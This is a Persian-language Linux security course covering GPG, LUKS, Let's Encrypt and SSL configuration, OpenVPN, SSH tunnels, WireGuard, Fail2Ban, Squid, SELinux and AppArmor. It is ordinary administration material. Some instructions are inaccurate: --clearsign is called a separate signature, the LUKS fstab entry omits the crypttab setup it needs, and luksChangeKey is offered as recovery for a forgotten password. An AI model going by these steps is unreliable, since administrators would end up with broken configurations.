روی Ubuntu/Debian:

sudo apt update
sudo apt install gnupg -y

روی CentOS/RHEL:

sudo yum install gnupg2 -y

روی Arch Linux:

sudo pacman -S gnupg

ایجاد کلید GPG

برای رمزنگاری داده‌ها ابتدا باید یک جفت کلید (کلید عمومی و خصوصی) ایجاد کرد. این کلیدها برای رمزگذاری و امضای دیجیتال استفاده می‌شوند.

دستور زیر را برای ایجاد کلید جدید اجرا کنید:

gpg --full-generate-key

این دستور چندین سوال از شما خواهد پرسید، از جمله:

• نوع کلید: گزینه RSA and RSA را انتخاب کنید.
• طول کلید: مقدار 4096 را وارد کنید تا امنیت بالاتری داشته باشد.
• مدت اعتبار: مقدار 0 را وارد کنید تا کلید دائمی باشد.
• نام و ایمیل: اطلاعات خود را وارد کنید.
• رمز عبور: یک رمز عبور قوی تعیین کنید.

پس از اتمام فرآیند، کلید عمومی و خصوصی شما ایجاد خواهد شد. برای مشاهده کلید عمومی:

gpg --list-keys

برای مشاهده کلید خصوصی:

gpg --list-secret-keys

صادر کردن کلید عمومی

برای به اشتراک‌گذاری کلید عمومی خود با دیگران، از دستور زیر استفاده کنید:

gpg --export --armor user@example.com > public-key.asc

وارد کردن کلید عمومی دیگران

برای رمزگذاری داده‌ها برای یک فرد خاص، ابتدا باید کلید عمومی آن فرد را دریافت و به GPG اضافه کنید:

gpg --import public-key.asc

رمزنگاری فایل با GPG

برای رمزنگاری یک فایل با استفاده از کلید عمومی یک فرد خاص:

gpg --encrypt --recipient user@example.com file.txt

فایل رمزگذاری‌شده به نام file.txt.gpg ایجاد خواهد شد.

رمزگشایی فایل

فرد دریافت‌کننده می‌تواند با استفاده از کلید خصوصی خود فایل را رمزگشایی کند:

gpg --decrypt file.txt.gpg > decrypted-file.txt

امضای دیجیتال فایل‌ها

برای تأیید صحت فایل‌ها، می‌توان از امضای دیجیتال GPG استفاده کرد. برای امضای یک فایل:

gpg --sign file.txt

این کار فایلی با پسوند .gpg ایجاد می‌کند که امضا شده است.

اگر بخواهید امضا را به‌صورت مجزا داشته باشید:

gpg --clearsign file.txt

تأیید امضای دیجیتال

برای بررسی امضای دیجیتال یک فایل:

gpg --verify file.txt.asc

حذف کلیدهای GPG

برای حذف یک کلید عمومی:

gpg --delete-key user@example.com

برای حذف کلید خصوصی:

gpg --delete-secret-key user@example.com

مسیر فایل‌های GPG

فایل‌های مربوط به کلیدهای GPG در مسیر زیر ذخیره می‌شوند:

~/.gnupg/

• کلیدهای عمومی: ~/.gnupg/pubring.kbx
• کلیدهای خصوصی: ~/.gnupg/private-keys-v1.d/
• تنظیمات GPG: ~/.gnupg/gpg.conf

جمع‌بندی

• GPG ابزاری قدرتمند برای رمزنگاری و امضای دیجیتال است.
• برای استفاده از آن باید یک جفت کلید عمومی و خصوصی ایجاد کرد.
• رمزگذاری و رمزگشایی فایل‌ها با کلیدهای GPG انجام می‌شود.
• امضای دیجیتال امکان تأیید صحت فایل‌ها را فراهم می‌کند.
• مدیریت کلیدهای GPG شامل وارد کردن، صادر کردن و حذف کلیدها می‌شود.
• فایل‌های مربوط به GPG در مسیر ~/.gnupg/ ذخیره می‌شوند.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”پیاده‌سازی LUKS برای رمزنگاری دیسک‌ها و پارتیشن‌ها” subtitle=”توضیحات کامل”]LUKS (Linux Unified Key Setup) یک استاندارد رمزنگاری دیسک در لینوکس است که امکان رمزنگاری کامل پارتیشن‌ها را فراهم می‌کند. این روش امنیت بالایی دارد و از کلیدهای قوی برای حفاظت از اطلاعات استفاده می‌کند. در این بخش، نحوه استفاده از LUKS برای رمزنگاری دیسک‌ها و پارتیشن‌ها همراه با دستورات و مسیر فایل‌های مربوطه بررسی خواهد شد.

بررسی پیش‌نیازها و نصب بسته‌های موردنیاز

قبل از شروع فرآیند رمزنگاری، اطمینان حاصل کنید که بسته cryptsetup روی سیستم شما نصب شده است. برای بررسی نصب این بسته از دستور زیر استفاده کنید:

cryptsetup --version

در صورتی که این بسته نصب نشده باشد، می‌توانید آن را در توزیع‌های مختلف لینوکس با استفاده از دستورات زیر نصب کنید:

در Debian و Ubuntu:

sudo apt update
sudo apt install cryptsetup

در CentOS و RHEL:

sudo yum install cryptsetup

در Arch Linux:

sudo pacman -S cryptsetup

ایجاد یک پارتیشن جدید برای رمزنگاری

در صورتی که می‌خواهید یک دیسک یا پارتیشن جدید را رمزنگاری کنید، ابتدا با استفاده از fdisk یا parted یک پارتیشن جدید ایجاد کنید. در این مثال، دیسک /dev/sdb برای رمزنگاری انتخاب شده است.

sudo fdisk /dev/sdb

در داخل محیط fdisk مراحل زیر را انجام دهید:

• با فشار دادن n یک پارتیشن جدید بسازید.
• نوع آن را Linux LVM تنظیم کنید (Hex Code: 8E).
• تغییرات را ذخیره کنید (w).

رمزنگاری پارتیشن با استفاده از LUKS

برای رمزنگاری پارتیشن /dev/sdb1 از دستور زیر استفاده کنید:

sudo cryptsetup luksFormat /dev/sdb1

پس از اجرای این دستور، سیستم از شما یک رمز عبور قوی درخواست می‌کند که برای باز کردن این پارتیشن در آینده استفاده خواهد شد.

باز کردن پارتیشن رمزنگاری‌شده

بعد از رمزنگاری، باید پارتیشن را باز کنید تا بتوانید از آن استفاده کنید. برای انجام این کار از دستور زیر استفاده کنید:

sudo cryptsetup luksOpen /dev/sdb1 encrypted_partition

پس از وارد کردن رمز عبور، پارتیشن با نام encrypted_partition در مسیر /dev/mapper/encrypted_partition در دسترس خواهد بود.

فرمت کردن پارتیشن رمزنگاری‌شده

قبل از استفاده، پارتیشن باید فرمت شود. در اینجا سیستم فایل ext4 برای آن در نظر گرفته شده است:

sudo mkfs.ext4 /dev/mapper/encrypted_partition

مونت کردن پارتیشن رمزنگاری‌شده

برای استفاده از پارتیشن، آن را در یک دایرکتوری مشخص مونت کنید:

sudo mount /dev/mapper/encrypted_partition /mnt

افزودن پارتیشن به fstab برای مونت خودکار

برای اینکه پارتیشن رمزنگاری‌شده پس از ریبوت به‌صورت خودکار در دسترس باشد، مقدار زیر را به فایل /etc/fstab اضافه کنید:

/dev/mapper/encrypted_partition  /mnt  ext4  defaults  0  2

بسته شدن و جدا کردن پارتیشن رمزنگاری‌شده

پس از استفاده، بهتر است پارتیشن را از سیستم جدا کرده و قفل کنید. برای انجام این کار مراحل زیر را اجرا کنید:

1. آن‌مونت کردن پارتیشن:

sudo umount /mnt

2. بستن دسترسی به پارتیشن رمزنگاری‌شده:

sudo cryptsetup luksClose encrypted_partition

بازیابی رمز عبور در صورت فراموشی

اگر رمز عبور را فراموش کردید اما هنوز یک کلید بازیابی دیگر را به پارتیشن اضافه کرده‌اید، می‌توانید با استفاده از دستور زیر رمز عبور را تغییر دهید:

sudo cryptsetup luksChangeKey /dev/sdb1

در صورتی که هیچ کلید دیگری در دسترس نباشد، بازیابی اطلاعات بسیار دشوار خواهد بود.

جمع بندی

در این بخش، نحوه پیاده‌سازی LUKS برای رمزنگاری دیسک‌ها و پارتیشن‌ها در لینوکس آموزش داده شد. مراحل اصلی شامل ایجاد پارتیشن، رمزنگاری آن، باز کردن و فرمت کردن پارتیشن رمزنگاری‌شده، مونت کردن آن و همچنین مدیریت کلیدها بود. با این روش می‌توان امنیت بالایی برای اطلاعات حساس فراهم کرد و از دسترسی‌های غیرمجاز جلوگیری نمود.[/cdb_course_lesson][cdb_course_lesson title=”تنظیمات SSL/TLS”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”پیکربندی SSL/TLS برای امنیت ارتباطات وب” subtitle=”توضیحات کامل”]SSL/TLS یکی از مهم‌ترین پروتکل‌ها برای تأمین امنیت ارتباطات وب است. این پروتکل با رمزنگاری داده‌ها بین کاربر و سرور، از شنود و تغییر اطلاعات جلوگیری می‌کند. در این بخش نحوه پیکربندی SSL/TLS روی سرور وب بررسی خواهد شد.

دریافت و نصب گواهینامه SSL

برای استفاده از SSL/TLS باید یک گواهینامه معتبر داشته باشید. این گواهینامه می‌تواند از یک CA (مرجع صدور گواهینامه) تهیه شود یا از Let’s Encrypt که یک ارائه‌دهنده رایگان SSL است.

نصب Certbot برای دریافت گواهینامه Let’s Encrypt

برای دریافت گواهینامه رایگان از Let’s Encrypt، ابزار Certbot را نصب کنید:

sudo apt update
sudo apt install certbot python3-certbot-nginx

دریافت گواهینامه برای Nginx

برای پیکربندی گواهینامه روی Nginx، دستور زیر را اجرا کنید:

sudo certbot --nginx -d example.com -d www.example.com

این دستور به طور خودکار تنظیمات Nginx را به‌روزرسانی کرده و گواهینامه را فعال می‌کند.

دریافت گواهینامه برای Apache

اگر از Apache استفاده می‌کنید، دستور زیر را اجرا کنید:

sudo certbot --apache -d example.com -d www.example.com

پیکربندی دستی SSL در Nginx

اگر قصد دارید به صورت دستی SSL را در Nginx تنظیم کنید، باید فایل تنظیمات سرور را ویرایش کنید. فایل مربوطه در مسیر زیر قرار دارد:

/etc/nginx/sites-available/default

فایل را با یک ویرایشگر متنی باز کنید:

sudo nano /etc/nginx/sites-available/default

و خطوط زیر را اضافه یا ویرایش کنید:

server {
    listen 443 ssl;
    server_name example.com www.example.com;

    ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers "ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256";

    location / {
        root /var/www/html;
        index index.html;
    }
}

بعد از اعمال تغییرات، سرویس Nginx را ری‌استارت کنید:

sudo systemctl restart nginx

پیکربندی دستی SSL در Apache

برای پیکربندی SSL در Apache، فایل تنظیمات را در مسیر زیر ویرایش کنید:

/etc/apache2/sites-available/default-ssl.conf

با دستور زیر فایل را ویرایش کنید:

sudo nano /etc/apache2/sites-available/default-ssl.conf

و خطوط زیر را تنظیم کنید:

<VirtualHost *:443>
    ServerName example.com
    DocumentRoot /var/www/html

    SSLEngine on
    SSLCertificateFile /etc/letsencrypt/live/example.com/fullchain.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/example.com/privkey.pem

    <Directory /var/www/html>
        AllowOverride All
    </Directory>
</VirtualHost>

فعال‌سازی پیکربندی SSL و ری‌استارت Apache:

sudo a2enmod ssl
sudo a2ensite default-ssl.conf
sudo systemctl restart apache2

تمدید خودکار گواهینامه SSL

گواهینامه‌های صادر شده توسط Let’s Encrypt هر ۹۰ روز یک‌بار منقضی می‌شوند. برای تمدید خودکار می‌توان از Cron Job استفاده کرد. دستورات زیر را برای بررسی و تمدید خودکار اجرا کنید:

sudo certbot renew --dry-run

برای ایجاد یک Cron Job جهت تمدید خودکار:

sudo crontab -e

و این خط را اضافه کنید:

0 3 * * * /usr/bin/certbot renew --quiet

این دستور هر روز ساعت ۳ صبح تمدید را بررسی می‌کند.

جمع‌بندی

در این بخش نحوه دریافت و نصب گواهینامه SSL، پیکربندی دستی SSL در Nginx و Apache، و تمدید خودکار گواهینامه بررسی شد. استفاده از SSL/TLS برای تأمین امنیت ارتباطات وب ضروری است و به جلوگیری از حملات مرد میانی (MITM) کمک می‌کند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از Let’s Encrypt برای صدور گواهی SSL رایگان” subtitle=”توضیحات کامل”]Let’s Encrypt یک مرجع صدور گواهینامه (CA) رایگان، خودکار و منبع باز است که امکان دریافت و تمدید خودکار گواهینامه‌های SSL/TLS را فراهم می‌کند. این گواهینامه‌ها برای رمزنگاری ارتباطات وب مورد استفاده قرار می‌گیرند و امنیت اطلاعات کاربران را تضمین می‌کنند.

در این بخش، نحوه دریافت، نصب و تمدید خودکار گواهینامه‌های Let’s Encrypt را روی وب‌سرورهای Nginx و Apache بررسی می‌کنیم.

---

نصب Certbot

برای مدیریت گواهینامه‌های Let’s Encrypt، ابزار Certbot استفاده می‌شود. ابتدا باید این ابزار را روی سرور نصب کنیم. بسته به توزیع لینوکسی که استفاده می‌کنید، مراحل نصب ممکن است کمی متفاوت باشد.

نصب Certbot در Debian/Ubuntu:

sudo apt update
sudo apt install certbot python3-certbot-nginx -y

نصب Certbot در CentOS/RHEL:

sudo dnf install epel-release -y
sudo dnf install certbot python3-certbot-nginx -y

نصب Certbot در Arch Linux:

sudo pacman -S certbot certbot-nginx

---

دریافت گواهینامه SSL برای Nginx

پس از نصب Certbot، می‌توانیم گواهینامه SSL را برای دامنه موردنظر دریافت کنیم. در اینجا فرض می‌کنیم که دامنه شما example.com است.

sudo certbot --nginx -d example.com -d www.example.com

این دستور:

• به‌طور خودکار پیکربندی Nginx را تنظیم می‌کند.
• یک گواهینامه معتبر SSL صادر می‌کند.
• وب‌سایت را برای استفاده از HTTPS پیکربندی می‌کند.

پس از اجرای این دستور، گواهینامه‌ها در مسیر زیر ذخیره خواهند شد:

/etc/letsencrypt/live/example.com/

فایل‌های موجود در این مسیر:

• fullchain.pem: شامل گواهینامه SSL و گواهینامه‌های میانی
• privkey.pem: کلید خصوصی مرتبط با گواهینامه

---

پیکربندی دستی Nginx برای استفاده از گواهینامه

اگر می‌خواهید گواهینامه را به‌صورت دستی پیکربندی کنید، فایل تنظیمات Nginx را در مسیر زیر ویرایش کنید:

/etc/nginx/sites-available/example.com

و محتوای زیر را اضافه کنید:

server {
    listen 443 ssl;
    server_name example.com www.example.com;

    ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;

    location / {
        root /var/www/html;
        index index.html;
    }
}

سپس تنظیمات Nginx را بررسی و سرور را ری‌استارت کنید:

sudo nginx -t
sudo systemctl restart nginx

---

دریافت گواهینامه SSL برای Apache

برای دریافت و پیکربندی خودکار گواهینامه SSL در Apache، از دستور زیر استفاده کنید:

sudo certbot --apache -d example.com -d www.example.com

این دستور:

• گواهینامه را دریافت و نصب می‌کند.
• فایل پیکربندی Apache را تغییر می‌دهد.
• وب‌سایت را برای استفاده از HTTPS آماده می‌کند.

گواهینامه‌ها در مسیر زیر ذخیره می‌شوند:

/etc/letsencrypt/live/example.com/

---

پیکربندی دستی Apache برای استفاده از گواهینامه

برای انجام تنظیمات دستی، فایل تنظیمات Apache را ویرایش کنید:

/etc/apache2/sites-available/example.com-le-ssl.conf

و تنظیمات زیر را اضافه کنید:

<VirtualHost *:443>
    ServerName example.com
    DocumentRoot /var/www/html

    SSLEngine on
    SSLCertificateFile /etc/letsencrypt/live/example.com/fullchain.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/example.com/privkey.pem
</VirtualHost>

سپس Apache را ری‌استارت کنید:

sudo systemctl restart apache2

---

تمدید خودکار گواهینامه SSL

گواهینامه‌های Let’s Encrypt دارای اعتبار ۹۰ روزه هستند. برای تمدید خودکار آن‌ها، می‌توان از دستور زیر استفاده کرد:

sudo certbot renew --dry-run

برای اجرای خودکار تمدید، یک کرون‌جاب اضافه کنید:

sudo crontab -e

و خط زیر را اضافه کنید:

0 3 * * * certbot renew --quiet

این تنظیم باعث می‌شود که هر روز ساعت ۳ بامداد، Certbot بررسی کند که آیا گواهینامه نیاز به تمدید دارد یا نه.

---

جمع‌بندی

در این بخش، نحوه استفاده از Let’s Encrypt برای دریافت و پیکربندی گواهینامه SSL روی وب‌سرورهای Nginx و Apache بررسی شد. همچنین، روش تمدید خودکار گواهینامه‌ها آموزش داده شد. با استفاده از این راهکارها، می‌توان امنیت ارتباطات وب را به‌صورت رایگان و بدون نیاز به تنظیمات پیچیده افزایش داد.[/cdb_course_lesson][cdb_course_lesson title=”امنیت درون شبکه”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از VPN برای ارتباطات امن از راه دور” subtitle=”توضیحات کامل”]VPN (Virtual Private Network) یک راهکار امنیتی برای رمزنگاری ترافیک شبکه و ایجاد یک تونل امن برای ارتباطات از راه دور است. این روش برای سازمان‌ها و کاربران شخصی که به امنیت داده‌های خود اهمیت می‌دهند، بسیار حیاتی است. در این بخش، نحوه راه‌اندازی OpenVPN روی یک سرور لینوکسی آموزش داده می‌شود.

---

نصب OpenVPN و Easy-RSA

برای راه‌اندازی OpenVPN، ابتدا باید بسته‌های موردنیاز را نصب کنیم. Easy-RSA ابزاری برای مدیریت کلیدها و گواهینامه‌های امنیتی موردنیاز VPN است.

نصب OpenVPN و Easy-RSA در Debian/Ubuntu:

sudo apt update
sudo apt install openvpn easy-rsa -y

نصب OpenVPN و Easy-RSA در CentOS/RHEL:

sudo yum install -y epel-release
sudo yum install -y openvpn easy-rsa

---

ایجاد CA (مرجع صدور گواهینامه)

OpenVPN برای رمزنگاری ارتباطات از گواهینامه‌های TLS استفاده می‌کند. ابتدا باید یک CA برای مدیریت گواهینامه‌های سرور و کلاینت ایجاد کنیم.

1. ایجاد یک دایرکتوری جدید برای Easy-RSA:

mkdir -p ~/openvpn-ca
cp -r /usr/share/easy-rsa/* ~/openvpn-ca/
cd ~/openvpn-ca

2. مقداردهی اولیه Easy-RSA:

./easyrsa init-pki

3. ایجاد CA و تنظیم کلید اصلی:

./easyrsa build-ca

پس از اجرای این دستور، از شما درخواست می‌شود که یک رمز عبور برای CA تعیین کنید و برخی اطلاعات مانند کشور، سازمان و ایمیل را وارد کنید.

---

ایجاد کلید و گواهینامه سرور

پس از ایجاد CA، باید کلید و گواهینامه سرور VPN را ایجاد کنیم.

./easyrsa gen-req server nopass

سپس گواهینامه را امضا می‌کنیم:

./easyrsa sign-req server server

---

ایجاد کلید Diffie-Hellman

کلید Diffie-Hellman برای افزایش امنیت ارتباطات استفاده می‌شود. برای تولید این کلید از دستور زیر استفاده کنید:

./easyrsa gen-dh

---

راه‌اندازی OpenVPN سرور

پس از ایجاد گواهینامه‌ها، باید OpenVPN را پیکربندی کنیم. فایل تنظیمات OpenVPN را در مسیر زیر ایجاد کنید:

/etc/openvpn/server.conf

و محتوای زیر را اضافه کنید:

port 1194
proto udp
dev tun
ca /etc/openvpn/ca.crt
cert /etc/openvpn/server.crt
key /etc/openvpn/server.key
dh /etc/openvpn/dh.pem
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist /var/log/openvpn/ipp.txt
keepalive 10 120
cipher AES-256-CBC
persist-key
persist-tun
status /var/log/openvpn/status.log
verb 3

پس از ایجاد این فایل، OpenVPN را راه‌اندازی کنید:

sudo systemctl start openvpn@server
sudo systemctl enable openvpn@server

---

ایجاد کلید و گواهینامه برای کلاینت

برای هر کلاینتی که قصد اتصال به VPN را دارد، باید یک کلید و گواهینامه منحصربه‌فرد ایجاد کنیم.

1. ایجاد کلید خصوصی کلاینت:

./easyrsa gen-req client1 nopass

2. امضای گواهینامه کلاینت:

./easyrsa sign-req client client1

3. انتقال فایل‌های موردنیاز به کلاینت:

فایل‌های زیر باید به دستگاه کلاینت منتقل شوند:

ca.crt
client1.crt
client1.key

---

پیکربندی کلاینت OpenVPN

برای اتصال به سرور، باید یک فایل پیکربندی برای کلاینت ایجاد کنیم. این فایل را در مسیر زیر ذخیره کنید:

C:\Program Files\OpenVPN\config\client.ovpn

و محتوای زیر را اضافه کنید:

client
dev tun
proto udp
remote SERVER_IP 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
cipher AES-256-CBC
verb 3

در قسمت remote SERVER_IP، آدرس IP سرور OpenVPN را وارد کنید.

---

تست اتصال به VPN

پس از پیکربندی، کلاینت OpenVPN را اجرا کرده و به سرور متصل شوید. با اجرای دستور زیر در سرور می‌توان لاگ‌های اتصال را مشاهده کرد:

sudo journalctl -u openvpn@server -f

---

جمع‌بندی

در این بخش، نحوه راه‌اندازی OpenVPN برای ایجاد یک ارتباط امن از راه دور بررسی شد. مراحل شامل نصب OpenVPN، ایجاد گواهینامه‌ها، پیکربندی سرور و کلاینت و تست اتصال بود. با اجرای این مراحل، می‌توان یک شبکه امن ایجاد کرد که ارتباطات از راه دور را رمزنگاری کند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”تنظیمات امنیتی برای Tunneling و شبکه‌های خصوصی مجازی (VPN)” subtitle=”توضیحات کامل”]برای افزایش امنیت ارتباطات شبکه، استفاده از تونلینگ و VPN یکی از بهترین روش‌ها محسوب می‌شود. این فناوری‌ها ارتباطات را رمزگذاری کرده و امکان انتقال ایمن داده‌ها را فراهم می‌کنند. در این بخش، نحوه پیاده‌سازی، پیکربندی و افزایش امنیت تونلینگ و VPN را بررسی می‌کنیم.

---

۱. استفاده از OpenVPN برای ایجاد یک شبکه خصوصی مجازی (VPN)

نصب OpenVPN روی Debian/Ubuntu

sudo apt update && sudo apt install openvpn easy-rsa -y

ایجاد دایرکتوری برای گواهی‌های امنیتی

mkdir -p ~/openvpn-ca
cd ~/openvpn-ca
cp -r /usr/share/easy-rsa/* .

ایجاد CA (گواهی امضا شده برای VPN)

./easyrsa init-pki
./easyrsa build-ca

ایجاد کلید سرور OpenVPN

./easyrsa gen-req server nopass
./easyrsa sign-req server server

ایجاد کلاینت و امضای گواهی کلاینت

./easyrsa gen-req client1 nopass
./easyrsa sign-req client client1

پیکربندی OpenVPN در مسیر /etc/openvpn/server.conf

sudo nano /etc/openvpn/server.conf

افزودن این مقادیر:

port 1194
proto udp
dev tun
ca /etc/openvpn/ca.crt
cert /etc/openvpn/server.crt
key /etc/openvpn/server.key
dh /etc/openvpn/dh.pem
server 10.8.0.0 255.255.255.0
push "redirect-gateway def1 bypass-dhcp"
keepalive 10 120
cipher AES-256-CBC
auth SHA256
tls-auth /etc/openvpn/ta.key 0

اجرای OpenVPN و فعال‌سازی در استارتاپ سیستم

sudo systemctl start openvpn@server
sudo systemctl enable openvpn@server

افزودن قانون فایروال برای عبور ترافیک VPN

sudo ufw allow 1194/udp
sudo ufw enable

---

۲. ایجاد تونل SSH امن با استفاده از OpenSSH

ایجاد تونل SSH برای دسترسی امن به یک سرور از راه دور

ssh -L 8080:localhost:80 user@remote-server

• این دستور ترافیک پورت ۸۰ سرور راه دور را از طریق پورت ۸۰۸۰ روی سیستم لوکال هدایت می‌کند.

ایجاد تونل معکوس SSH برای دسترسی به یک کلاینت از راه دور

ssh -R 9090:localhost:22 user@remote-server

• این دستور اجازه می‌دهد که از سرور راه دور، پورت ۲۲ کلاینت را روی پورت ۹۰۹۰ مشاهده کنیم.

غیرفعال‌سازی پورت فورواردینگ برای امنیت بیشتر در /etc/ssh/sshd_config

sudo nano /etc/ssh/sshd_config

افزودن این مقادیر:

AllowTcpForwarding no
PermitTunnel no

اعمال تغییرات و راه‌اندازی مجدد سرویس SSH

sudo systemctl restart ssh

---

۳. تنظیمات WireGuard برای یک VPN سبک و سریع

نصب WireGuard روی Debian/Ubuntu

sudo apt install wireguard -y

ایجاد کلیدهای امنیتی سرور WireGuard

wg genkey | tee privatekey | wg pubkey > publickey

پیکربندی WireGuard در مسیر /etc/wireguard/wg0.conf

sudo nano /etc/wireguard/wg0.conf

افزودن مقادیر زیر:

[Interface]
PrivateKey = مقدار_کلید_خصوصی
Address = 10.0.0.1/24
ListenPort = 51820

[Peer]
PublicKey = مقدار_کلید_عمومی_کلاینت
AllowedIPs = 10.0.0.2/32

فعال‌سازی و راه‌اندازی WireGuard

sudo systemctl enable wg-quick@wg0
sudo systemctl start wg-quick@wg0

افزودن قانون فایروال برای WireGuard

sudo ufw allow 51820/udp

---

۴. افزایش امنیت VPN با Fail2Ban

نصب Fail2Ban

sudo apt install fail2ban -y

ایجاد فایل پیکربندی /etc/fail2ban/jail.local

sudo nano /etc/fail2ban/jail.local

افزودن این مقادیر برای حفاظت از OpenVPN:

[openvpn]
enabled = true
port = 1194
protocol = udp
filter = openvpn
logpath = /var/log/openvpn.log
maxretry = 5

راه‌اندازی مجدد Fail2Ban

sudo systemctl restart fail2ban

---

۵. مسیریابی ترافیک تونل از طریق یک سرور پراکسی امن

نصب و پیکربندی Squid Proxy برای مسیریابی ترافیک تونل VPN

sudo apt install squid -y

ویرایش فایل پیکربندی Squid در /etc/squid/squid.conf

sudo nano /etc/squid/squid.conf

افزودن این مقادیر:

http_port 3128
acl allowed_ips src 10.8.0.0/24
http_access allow allowed_ips

راه‌اندازی مجدد Squid

sudo systemctl restart squid

تنظیم کلاینت برای استفاده از پروکسی تونل

export http_proxy="http://10.8.0.1:3128"
export https_proxy="http://10.8.0.1:3128"

---

جمع‌بندی

✅ راه‌اندازی OpenVPN با رمزنگاری AES-256 برای امنیت بالا
✅ استفاده از SSH Tunneling برای انتقال امن داده‌ها
✅ راه‌اندازی WireGuard برای یک VPN سبک و پرسرعت
✅ افزایش امنیت تونلینگ با Fail2Ban و UFW
✅ مسیریابی ترافیک VPN از طریق Squid Proxy برای ناشناس ماندن

با اجرای این پیکربندی‌ها، ارتباطات شبکه‌ای شما ایمن خواهد بود و از شنود و حملات احتمالی محافظت می‌شود.[/cdb_course_lesson][cdb_course_lesson title=”فصل 5. سیاست‌ها و کنترل دسترسی”][/cdb_course_lesson][cdb_course_lesson title=”ایجاد سیاست‌های کنترل دسترسی بر اساس نیاز”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از SELinux و AppArmor برای سیاست‌های امنیتی سطح سیستم” subtitle=”توضیحات کامل”]امنیت سیستم‌های لینوکسی در سطح کرنل از اهمیت بالایی برخوردار است. دو مکانیزم اصلی برای اعمال سیاست‌های امنیتی در لینوکس SELinux و AppArmor هستند. این دو سیستم کنترل دسترسی پیشرفته به مدیران اجازه می‌دهند که مجوزهای سطح پایین را برای برنامه‌ها و فرایندها تعیین کنند. در این بخش، هر دو روش مورد بررسی قرار گرفته و نحوه پیکربندی آن‌ها به‌صورت گرافیکی و کامندی توضیح داده می‌شود.

---

SELinux: امنیت سطح سیستم با کنترل دقیق مجوزها

SELinux (Security-Enhanced Linux) یک ماژول امنیتی در کرنل لینوکس است که به کنترل دقیق سطح دسترسی برنامه‌ها و کاربران کمک می‌کند. SELinux از مدل MAC (Mandatory Access Control) استفاده می‌کند که برخلاف مدل DAC (Discretionary Access Control)، حتی کاربران با دسترسی ریشه نیز نمی‌توانند از سیاست‌های امنیتی عبور کنند.

بررسی وضعیت SELinux

برای بررسی وضعیت SELinux در سیستم، از دستور زیر استفاده کنید:

sestatus

در صورت فعال بودن، خروجی مشابه زیر خواهد بود:

SELinux status:                 enabled
SELinuxfs mount:                /sys/fs/selinux
SELinux root directory:         /etc/selinux
Current mode:                   enforcing

تغییر وضعیت SELinux

SELinux دارای سه حالت اجرایی است:

• Enforcing: سیاست‌های امنیتی اعمال می‌شوند.
• Permissive: سیاست‌ها ثبت می‌شوند اما اعمال نمی‌شوند.
• Disabled: SELinux غیرفعال است.

برای تغییر حالت SELinux، فایل تنظیمات آن را ویرایش کنید:

sudo nano /etc/selinux/config

و مقدار SELINUX= را به یکی از مقادیر زیر تغییر دهید:

SELINUX=enforcing
SELINUX=permissive
SELINUX=disabled

سپس برای اعمال تغییرات، سیستم را راه‌اندازی مجدد کنید:

sudo reboot

مدیریت سیاست‌های SELinux

برای نمایش سیاست‌های اعمال‌شده، از ابزار semanage استفاده کنید:

semanage boolean -l

برای تغییر سیاست‌های امنیتی خاص، مثلاً فعال کردن دسترسی سرور وب به فایل‌های عمومی:

sudo setsebool -P httpd_read_user_content on

مدیریت کانتکست‌های امنیتی

برای بررسی کانتکست SELinux روی یک فایل:

ls -Z /var/www/html/index.html

برای تغییر کانتکست امنیتی:

sudo chcon -t httpd_sys_content_t /var/www/html/index.html

غیرفعال‌سازی موقتی SELinux

برای خاموش کردن SELinux بدون نیاز به راه‌اندازی مجدد:

sudo setenforce 0

برای فعال‌سازی مجدد:

sudo setenforce 1

---

AppArmor: سیاست‌های امنیتی مبتنی بر پروفایل

AppArmor یک سیستم کنترل دسترسی دیگر برای لینوکس است که بر اساس پروفایل‌های امنیتی کار می‌کند. این ابزار به مدیران اجازه می‌دهد که سطح دسترسی برنامه‌ها را محدود کرده و از اجرای کدهای مخرب جلوگیری کنند.

بررسی وضعیت AppArmor

برای بررسی وضعیت AppArmor، از دستور زیر استفاده کنید:

sudo aa-status

فعال‌سازی و غیرفعال‌سازی AppArmor

برای فعال‌سازی AppArmor، از دستور زیر استفاده کنید:

sudo systemctl enable apparmor
sudo systemctl start apparmor

برای غیرفعال کردن:

sudo systemctl stop apparmor
sudo systemctl disable apparmor

مدیریت پروفایل‌های AppArmor

برای مشاهده لیست پروفایل‌های موجود:

sudo aa-status

برای تغییر حالت یک پروفایل خاص:

sudo aa-complain /usr/bin/firefox

یا برای بازگرداندن به حالت قبلی:

sudo aa-enforce /usr/bin/firefox

ایجاد یک پروفایل جدید برای یک برنامه

برای ایجاد یک پروفایل جدید، از ابزار aa-genprof استفاده کنید:

sudo aa-genprof /usr/bin/myapp

سپس، برنامه را اجرا کنید و فعالیت‌های آن را بررسی کنید تا AppArmor مجوزهای مناسب را پیشنهاد کند.

حذف یک پروفایل AppArmor

برای حذف پروفایل امنیتی یک برنامه:

sudo rm /etc/apparmor.d/usr.bin.myapp

---

جمع‌بندی

